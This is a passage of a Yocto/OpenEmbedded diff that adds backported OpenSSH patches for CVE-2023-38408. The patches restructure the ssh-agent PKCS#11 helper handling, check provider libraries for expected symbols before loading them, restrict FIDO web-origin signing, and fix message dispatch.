+	u_char *blob = NULL, *signature = NULL;
+	size_t blen, slen = 0;
+	int r, nid;
++	struct helper *helper;
+
++	if ((helper = helper_by_ec(ec)) == NULL || helper->fd == -1)
++		fatal("%s: no helper for PKCS11 key", __func__);
++	debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
+	nid = sshkey_ecdsa_key_to_nid(ec);
+	if (nid < 0) {
+		error("%s: couldn't get curve nid", __func__);
+@@ -203,10 +356,10 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+	    (r = sshbuf_put_string(msg, dgst, dgst_len)) != 0 ||
+	    (r = sshbuf_put_u32(msg, 0)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+-	send_msg(msg);
++	send_msg(helper->fd, msg);
+	sshbuf_reset(msg);
+
+-	if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
++	if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
+		if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
+			fatal("%s: buffer error: %s", __func__, ssh_err(r));
+		cp = signature;
+@@ -220,75 +373,110 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
+	sshbuf_free(msg);
+	return (ret);
+ }
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+
+-static RSA_METHOD	*helper_rsa;
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-static EC_KEY_METHOD	*helper_ecdsa;
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
++static void
++ecdsa_do_finish(EC_KEY *ec)
++{
++	struct helper *helper;
++
++	if ((helper = helper_by_ec(ec)) == NULL)
++		fatal("%s: no helper for PKCS11 key", __func__);
++	debug3("%s: free PKCS11 ECDSA key for provider %s", __func__, helper->path);
++	if (helper->ec_finish != NULL)
++		helper->ec_finish(ec);
++	if (helper->nec == 0)
++		fatal("%s: ECDSA refcount error", __func__);
++	helper->nec--;
++	debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++	    helper->path, helper->nrsa, helper->nec);
++	if (helper->nrsa == 0 && helper->nec == 0)
++		helper_terminate(helper);
++}
+
+ /* redirect private key crypto operations to the ssh-pkcs11-helper */
+ static void
+-wrap_key(struct sshkey *k)
++wrap_key(struct helper *helper, struct sshkey *k)
+ {
+-	if (k->type == KEY_RSA)
+-		RSA_set_method(k->rsa, helper_rsa);
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-	else if (k->type == KEY_ECDSA)
+-		EC_KEY_set_method(k->ecdsa, helper_ecdsa);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+-	else
++	debug3("%s: wrap %s for provider %s", __func__, sshkey_type(k), helper->path);
++	if (k->type == KEY_RSA) {
++		RSA_set_method(k->rsa, helper->rsa_meth);
++		if (helper->nrsa++ >= INT_MAX)
++			fatal("%s: RSA refcount error", __func__);
++	} else if (k->type == KEY_ECDSA) {
++		EC_KEY_set_method(k->ecdsa, helper->ec_meth);
++		if (helper->nec++ >= INT_MAX)
++			fatal("%s: EC refcount error", __func__);
++	} else
+		fatal("%s: unknown key type", __func__);
++	k->flags |= SSHKEY_FLAG_EXT;
++	debug3("%s: provider %s remaining keys: %zu RSA %zu ECDSA", __func__,
++	    helper->path, helper->nrsa, helper->nec);
+ }
+
+ static int
+-pkcs11_start_helper_methods(void)
++pkcs11_start_helper_methods(struct helper *helper)
+ {
+-	if (helper_rsa != NULL)
+-		return (0);
+-
+-#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
+-	int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
++	int (*ec_init)(EC_KEY *key);
++	int (*ec_copy)(EC_KEY *dest, const EC_KEY *src);
++	int (*ec_set_group)(EC_KEY *key, const EC_GROUP *grp);
++	int (*ec_set_private)(EC_KEY *key, const BIGNUM *priv_key);
++	int (*ec_set_public)(EC_KEY *key, const EC_POINT *pub_key);
++	int (*ec_sign)(int, const unsigned char *, int, unsigned char *,
+	    unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
+-	if (helper_ecdsa != NULL)
+-		return (0);
+-	helper_ecdsa = EC_KEY_METHOD_new(EC_KEY_OpenSSL());
+-	if (helper_ecdsa == NULL)
+-		return (-1);
+-	EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
+-	EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
+-#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
+-
+-	if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
++	RSA_METHOD *rsa_meth;
++	EC_KEY_METHOD *ec_meth;
++
++	if ((ec_meth = EC_KEY_METHOD_new(EC_KEY_OpenSSL())) == NULL)
++		return -1;
++	EC_KEY_METHOD_get_sign(ec_meth, &ec_sign, NULL, NULL);
++	EC_KEY_METHOD_set_sign(ec_meth, ec_sign, NULL, ecdsa_do_sign);
++	EC_KEY_METHOD_get_init(ec_meth, &ec_init, &helper->ec_finish,
++	    &ec_copy, &ec_set_group, &ec_set_private, &ec_set_public);
++	EC_KEY_METHOD_set_init(ec_meth, ec_init, ecdsa_do_finish,
++	    ec_copy, ec_set_group, ec_set_private, ec_set_public);
++
++	if ((rsa_meth = RSA_meth_dup(RSA_get_default_method())) == NULL)
+		fatal("%s: RSA_meth_dup failed", __func__);
+-	if (!RSA_meth_set1_name(helper_rsa, "ssh-pkcs11-helper") ||
+-	    !RSA_meth_set_priv_enc(helper_rsa, rsa_encrypt))
++	helper->rsa_finish = RSA_meth_get_finish(rsa_meth);
++	if (!RSA_meth_set1_name(rsa_meth, "ssh-pkcs11-helper") ||
++	    !RSA_meth_set_priv_enc(rsa_meth, rsa_encrypt) ||
++	    !RSA_meth_set_finish(rsa_meth, rsa_finish))
+		fatal("%s: failed to prepare method", __func__);
+
+-	return (0);
++	helper->ec_meth = ec_meth;
++	helper->rsa_meth = rsa_meth;
++	return 0;
+ }
+
+-static int
+-pkcs11_start_helper(void)
++static struct helper *
++pkcs11_start_helper(const char *path)
+ {
+	int pair[2];
+-	char *helper, *verbosity = NULL;
+-
+-	if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
+-		verbosity = "-vvv";
+-
+-	if (pkcs11_start_helper_methods() == -1) {
+-		error("pkcs11_start_helper_methods failed");
+-		return (-1);
+-	}
++	char *prog, *verbosity = NULL;
++	struct helper *helper;
++	pid_t pid;
+
++	if (nhelpers >= INT_MAX)
++		fatal("%s: too many helpers", __func__);
++	debug3("%s: start helper for %s", __func__, path);
+	if (socketpair(AF_UNIX, SOCK_STREAM, 0, pair) == -1) {
+		error("socketpair: %s", strerror(errno));
+-		return (-1);
++		return NULL;
++	}
++	helper = xcalloc(1, sizeof(*helper));
++	if (pkcs11_start_helper_methods(helper) == -1) {
++		error("pkcs11_start_helper_methods failed");
++		goto fail;
+	}
+	if ((pid = fork()) == -1) {
+		error("fork: %s", strerror(errno));
+-		return (-1);
++ fail:
++		close(pair[0]);
++		close(pair[1]);
++		RSA_meth_free(helper->rsa_meth);
++		EC_KEY_METHOD_free(helper->ec_meth);
++		free(helper);
++		return NULL;
+	} else if (pid == 0) {
+		if ((dup2(pair[1], STDIN_FILENO) == -1) ||
+		    (dup2(pair[1], STDOUT_FILENO) == -1)) {
+@@ -297,18 +485,27 @@ pkcs11_start_helper(void)
+		}
+		close(pair[0]);
+		close(pair[1]);
+-		helper = getenv("SSH_PKCS11_HELPER");
+-		if (helper == NULL || strlen(helper) == 0)
+-			helper = _PATH_SSH_PKCS11_HELPER;
++		prog = getenv("SSH_PKCS11_HELPER");
++		if (prog == NULL || strlen(prog) == 0)
++			prog = _PATH_SSH_PKCS11_HELPER;
++		if (log_level_get() >= SYSLOG_LEVEL_DEBUG1)
++			verbosity = "-vvv";
+		debug("%s: starting %s %s", __func__, helper,
+		    verbosity == NULL ? "" : verbosity);
+-		execlp(helper, helper, verbosity, (char *)NULL);
+-		fprintf(stderr, "exec: %s: %s\n", helper, strerror(errno));
++		execlp(prog, prog, verbosity, (char *)NULL);
++		fprintf(stderr, "exec: %s: %s\n", prog, strerror(errno));
+		_exit(1);
+	}
+	close(pair[1]);
+-	fd = pair[0];
+-	return (0);
++	helper->fd = pair[0];
++	helper->path = xstrdup(path);
++	helper->pid = pid;
++	debug3("%s: helper %zu for \"%s\" on fd %d pid %ld", __func__, nhelpers,
++	    helper->path, helper->fd, (long)helper->pid);
++	helpers = xrecallocarray(helpers, nhelpers,
++	    nhelpers + 1, sizeof(*helpers));
++	helpers[nhelpers++] = helper;
++	return helper;
+ }
+
+ int
+@@ -322,9 +519,11 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+	size_t blen;
+	u_int nkeys, i;
+	struct sshbuf *msg;
++	struct helper *helper;
+
+-	if (fd < 0 && pkcs11_start_helper() < 0)
+-		return (-1);
++	if ((helper = helper_by_provider(name)) == NULL &&
++	    (helper = pkcs11_start_helper(name)) == NULL)
++		return -1;
+
+	if ((msg = sshbuf_new()) == NULL)
+		fatal("%s: sshbuf_new failed", __func__);
+@@ -332,10 +531,10 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+	    (r = sshbuf_put_cstring(msg, name)) != 0 ||
+	    (r = sshbuf_put_cstring(msg, pin)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+-	send_msg(msg);
++	send_msg(helper->fd, msg);
+	sshbuf_reset(msg);
+
+-	type = recv_msg(msg);
++	type = recv_msg(helper->fd, msg);
+	if (type == SSH2_AGENT_IDENTITIES_ANSWER) {
+		if ((r = sshbuf_get_u32(msg, &nkeys)) != 0)
+			fatal("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -350,7 +549,7 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+				    __func__, ssh_err(r));
+			if ((r = sshkey_from_blob(blob, blen, &k)) != 0)
+				fatal("%s: bad key: %s", __func__, ssh_err(r));
+-			wrap_key(k);
++			wrap_key(helper, k);
+			(*keysp)[i] = k;
+			if (labelsp)
+				(*labelsp)[i] = label;
+@@ -371,22 +570,15 @@ pkcs11_add_provider(char *name, char *pin, struct sshkey ***keysp,
+ int
+ pkcs11_del_provider(char *name)
+ {
+-	int r, ret = -1;
+-	struct sshbuf *msg;
+-
+-	if ((msg = sshbuf_new()) == NULL)
+-		fatal("%s: sshbuf_new failed", __func__);
+-	if ((r = sshbuf_put_u8(msg, SSH_AGENTC_REMOVE_SMARTCARD_KEY)) != 0 ||
+-	    (r = sshbuf_put_cstring(msg, name)) != 0 ||
+-	    (r = sshbuf_put_cstring(msg, "")) != 0)
+-		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+-	send_msg(msg);
+-	sshbuf_reset(msg);
+-
+-	if (recv_msg(msg) == SSH_AGENT_SUCCESS)
+-		ret = 0;
+-	sshbuf_free(msg);
+-	return (ret);
++	struct helper *helper;
++
++	/*
++	 * ssh-agent deletes keys before calling this, so the helper entry
++	 * should be gone before we get here.
++	 */
++	debug3("%s: delete %s", __func__, name);
++	if ((helper = helper_by_provider(name)) != NULL)
++		helper_terminate(helper);
++	return 0;
+ }
+-
+ #endif /* ENABLE_PKCS11 */
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
new file mode 100644
index 0000000000..e16e5e245e
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-03.patch
@@ -0,0 +1,171 @@
+From 2f1be98e83feb90665b9292eff8bb734537fd491 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 14:02:27 +0000
+Subject: [PATCH 03/12] upstream: Ensure FIDO/PKCS11 libraries contain expected
+ symbols
+
+This checks via nlist(3) that candidate provider libraries contain one
+of the symbols that we will require prior to dlopen(), which can cause
+a number of side effects, including execution of constructors.
+
+Feedback deraadt; ok markus
+
+OpenBSD-Commit-ID: 1508a5fbd74e329e69a55b56c453c292029aefbe
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/29ef8a04866ca14688d5b7fed7b8b9deab851f77]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ misc.c       | 77 ++++++++++++++++++++++++++++++++++++++++++++++++++++
+ misc.h       |  1 +
+ ssh-pkcs11.c |  4 +++
+ ssh-sk.c     |  6 ++--
+ 4 files changed, 86 insertions(+), 2 deletions(-)
+
+diff --git a/misc.c b/misc.c
+index 3a31d5c..8a107e4 100644
+--- a/misc.c
++++ b/misc.c
+@@ -28,6 +28,7 @@
+
+ #include <sys/types.h>
+ #include <sys/ioctl.h>
++#include <sys/mman.h>
+ #include <sys/socket.h>
+ #include <sys/stat.h>
+ #include <sys/time.h>
+@@ -41,6 +42,9 @@
+ #ifdef HAVE_POLL_H
+ #include <poll.h>
+ #endif
++#ifdef HAVE_NLIST_H
++#include <nlist.h>
++#endif
+ #include <signal.h>
+ #include <stdarg.h>
+ #include <stdio.h>
+@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
+	}
+	return osa.sa_handler;
+ }
++
++
++/*
++ * Returns zero if the library at 'path' contains symbol 's', nonzero
++ * otherwise.
++ */
++int
++lib_contains_symbol(const char *path, const char *s)
++{
++#ifdef HAVE_NLIST_H
++	struct nlist nl[2];
++	int ret = -1, r;
++
++	memset(nl, 0, sizeof(nl));
++	nl[0].n_name = xstrdup(s);
++	nl[1].n_name = NULL;
++	if ((r = nlist(path, nl)) == -1) {
++		error("%s: nlist failed for %s", __func__, path);
++		goto out;
++	}
++	if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
++		error("%s: library %s does not contain symbol %s", __func__, path, s);
++		goto out;
++	}
++	/* success */
++	ret = 0;
++ out:
++	free(nl[0].n_name);
++	return ret;
++#else /* HAVE_NLIST_H */
++	int fd, ret = -1;
++	struct stat st;
++	void *m = NULL;
++	size_t sz = 0;
++
++	memset(&st, 0, sizeof(st));
++	if ((fd = open(path, O_RDONLY)) < 0) {
++		error("%s: open %s: %s", __func__, path, strerror(errno));
++		return -1;
++	}
++	if (fstat(fd, &st) != 0) {
++		error("%s: fstat %s: %s", __func__, path, strerror(errno));
++		goto out;
++	}
++	if (!S_ISREG(st.st_mode)) {
++		error("%s: %s is not a regular file", __func__, path);
++		goto out;
++	}
++	if (st.st_size < 0 ||
++	    (size_t)st.st_size < strlen(s) ||
++	    st.st_size >= INT_MAX/2) {
++		error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
++		goto out;
++	}
++	sz = (size_t)st.st_size;
++	if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
++	    m == NULL) {
++		error("%s: mmap %s: %s", __func__, path, strerror(errno));
++		goto out;
++	}
++	if (memmem(m, sz, s, strlen(s)) == NULL) {
++		error("%s: %s does not contain expected string %s", __func__, path, s);
++		goto out;
++	}
++	/* success */
++	ret = 0;
++ out:
++	if (m != NULL && m != MAP_FAILED)
++		munmap(m, sz);
++	close(fd);
++	return ret;
++#endif /* HAVE_NLIST_H */
++}
+diff --git a/misc.h b/misc.h
+index 4a05db2..3f9f4db 100644
+--- a/misc.h
++++ b/misc.h
+@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
+ int	 parse_absolute_time(const char *, uint64_t *);
+ void	 format_absolute_time(uint64_t, char *, size_t);
+ int	 path_absolute(const char *);
++int	 lib_contains_symbol(const char *, const char *);
+
+ void	 sock_set_v6only(int);
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index b56a41b..639a6f7 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
+		    __func__, provider_id);
+		goto fail;
+	}
++	if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
++		error("provider %s is not a PKCS11 library", provider_id);
++		goto fail;
++	}
+	/* open shared pkcs11-library */
+	if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
+		error("dlopen %s failed: %s", provider_id, dlerror());
+diff --git a/ssh-sk.c b/ssh-sk.c
+index 5ff9381..9df12cc 100644
+--- a/ssh-sk.c
++++ b/ssh-sk.c
+@@ -119,10 +119,12 @@ sshsk_open(const char *path)
+ #endif
+		return ret;
+	}
+-	if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
+-		error("Provider \"%s\" dlopen failed: %s", path, dlerror());
++	if (lib_contains_symbol(path, "sk_api_version") != 0) {
++		error("provider %s is not an OpenSSH FIDO library", path);
+		goto fail;
+	}
++	if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
++		fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
+	if ((ret->sk_api_version = dlsym(ret->dlhandle,
+	    "sk_api_version")) == NULL) {
+		error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
+From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:55:53 +0000
+Subject: [PATCH 04/12] upstream: terminate process if requested to load a
+ PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
+
+OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-pkcs11.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
+index 639a6f7..7530acc 100644
+--- a/ssh-pkcs11.c
++++ b/ssh-pkcs11.c
+@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
+		error("dlopen %s failed: %s", provider_id, dlerror());
+		goto fail;
+	}
+-	if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
+-		error("dlsym(C_GetFunctionList) failed: %s", dlerror());
+-		goto fail;
+-	}
++	if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
++		fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
+	p = xcalloc(1, sizeof(*p));
+	p->name = xstrdup(provider_id);
+	p->handle = handle;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
+From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 May 2020 01:26:58 +0000
+Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
+ challenges for FIDO
+
+keys.
+
+When signing messages in ssh-agent using a FIDO key that has an
+application string that does not start with "ssh:", ensure that the
+message being signed is one of the forms expected for the SSH protocol
+(currently pubkey authentication and sshsig signatures).
+
+This prevents ssh-agent forwarding on a host that has FIDO keys
+attached granting the ability for the remote side to sign challenges
+for web authentication using those keys too.
+
+Note that the converse case of web browsers signing SSH challenges is
+already precluded because no web RP can have the "ssh:" prefix in the
+application string that we require.
+
+ok markus@
+
+OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
+ 1 file changed, 100 insertions(+), 10 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index ceb348c..1794f35 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -77,6 +77,7 @@
+
+ #include "xmalloc.h"
+ #include "ssh.h"
++#include "ssh2.h"
+ #include "sshbuf.h"
+ #include "sshkey.h"
+ #include "authfd.h"
+@@ -167,6 +168,9 @@ static long lifetime = 0;
+
+ static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
+
++/* Refuse signing of non-SSH messages for web-origin FIDO keys */
++static int restrict_websafe = 1;
++
+ static void
+ close_socket(SocketEntry *e)
+ {
+@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
+	return NULL;
+ }
+
++/*
++ * This function inspects a message to be signed by a FIDO key that has a
++ * web-like application string (i.e. one that does not begin with "ssh:".
++ * It checks that the message is one of those expected for SSH operations
++ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
++ * for the web.
++ */
++static int
++check_websafe_message_contents(struct sshkey *key,
++    const u_char *msg, size_t len)
++{
++	int matched = 0;
++	struct sshbuf *b;
++	u_char m, n;
++	char *cp1 = NULL, *cp2 = NULL;
++	int r;
++	struct sshkey *mkey = NULL;
++
++	if ((b = sshbuf_from(msg, len)) == NULL)
++		fatal("%s: sshbuf_new", __func__);
++
++	/* SSH userauth request */
++	if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
++	    (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
++	    (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
++	    (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
++	    (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
++	    (r = sshkey_froms(b, &mkey)) == 0 && /* key */
++	    sshbuf_len(b) == 0) {
++		debug("%s: parsed userauth", __func__);
++		if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
++		    strcmp(cp1, "ssh-connection") == 0 &&
++		    strcmp(cp2, "publickey") == 0 &&
++		    sshkey_equal(key, mkey)) {
++			debug("%s: well formed userauth", __func__);
++			matched = 1;
++		}
++	}
++	free(cp1);
++	free(cp2);
++	sshkey_free(mkey);
++	sshbuf_free(b);
++	if (matched)
++		return 1;
++
++	if ((b = sshbuf_from(msg, len)) == NULL)
++		fatal("%s: sshbuf_new", __func__);
++	cp1 = cp2 = NULL;
++	mkey = NULL;
++
++	/* SSHSIG */
++	if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
++	    (r = sshbuf_consume(b, 6)) == 0 &&
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
++	    (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
++	    (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
++	    (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
++	    sshbuf_len(b) == 0) {
++		debug("%s: parsed sshsig", __func__);
++		matched = 1;
++	}
++
++	sshbuf_free(b);
++	if (matched)
++		return 1;
++
++	/* XXX CA signature operation */
++
++	error("web-origin key attempting to sign non-SSH message");
++	return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
+		verbose("%s: user refused key", __func__);
+		goto send;
+	}
+-	if (sshkey_is_sk(id->key) &&
+-	    (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
+-		if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
+-		    SSH_FP_DEFAULT)) == NULL)
+-			fatal("%s: fingerprint failed", __func__);
+-		notifier = notify_start(0,
+-		    "Confirm user presence for key %s %s",
+-		    sshkey_type(id->key), fp);
++	if (sshkey_is_sk(id->key)) {
++		if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
++		    !check_websafe_message_contents(key, data, dlen)) {
++			/* error already logged */
++			goto send;
++		}
++		if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
++			if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++			    SSH_FP_DEFAULT)) == NULL)
++				fatal("%s: fingerprint failed", __func__);
++			notifier = notify_start(0,
++			    "Confirm user presence for key %s %s",
++			    sshkey_type(id->key), fp);
++		}
+	}
+	if ((r = sshkey_sign(id->key, &signature, &slen,
+	    data, dlen, agent_decode_alg(key, flags),
+@@ -1214,7 +1298,7 @@ main(int ac, char **av)
+	__progname = ssh_get_progname(av[0]);
+	seed_rng();
+
+-	while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
++	while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
+		switch (ch) {
+		case 'E':
+			fingerprint_hash = ssh_digest_alg_by_name(optarg);
+@@ -1229,6 +1313,12 @@ main(int ac, char **av)
+		case 'k':
+			k_flag++;
+			break;
++		case 'O':
++			if (strcmp(optarg, "no-restrict-websafe") == 0)
++				restrict_websafe  = 0;
++			else
++				fatal("Unknown -O option");
++			break;
+		case 'P':
+			if (provider_whitelist != NULL)
+				fatal("-P option already specified");
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
+From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 08:16:38 +0000
+Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
+
+PR#183 by Dennis Kaarsemaker; feedback and ok markus@
+
+OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 19 +++++++++++++------
+ 1 file changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 1794f35..78f7268 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
+ /*
+  * Author: Tatu Ylonen <ylo@cs.hut.fi>
+  * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -853,8 +853,10 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
+-/* dispatch incoming messages */
+-
++/*
++ * dispatch incoming message.
++ * returns 1 on success, 0 for incomplete messages or -1 on error.
++ */
+ static int
+ process_message(u_int socknum)
+ {
+@@ -908,7 +910,7 @@ process_message(u_int socknum)
+			/* send a fail message for all other request types */
+			send_status(e, 0);
+		}
+-		return 0;
++		return 1;
+	}
+
+	switch (type) {
+@@ -952,7 +954,7 @@ process_message(u_int socknum)
+		send_status(e, 0);
+		break;
+	}
+-	return 0;
++	return 1;
+ }
+
+ static void
+@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
+	if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
+		fatal("%s: buffer error: %s", __func__, ssh_err(r));
+	explicit_bzero(buf, sizeof(buf));
+-	process_message(socknum);
++	for (;;) {
++		if ((r = process_message(socknum)) == -1)
++			return -1;
++		else if (r == 0)
++			break;
++	}
+	return 0;
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
+From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:47:47 +0000
+Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
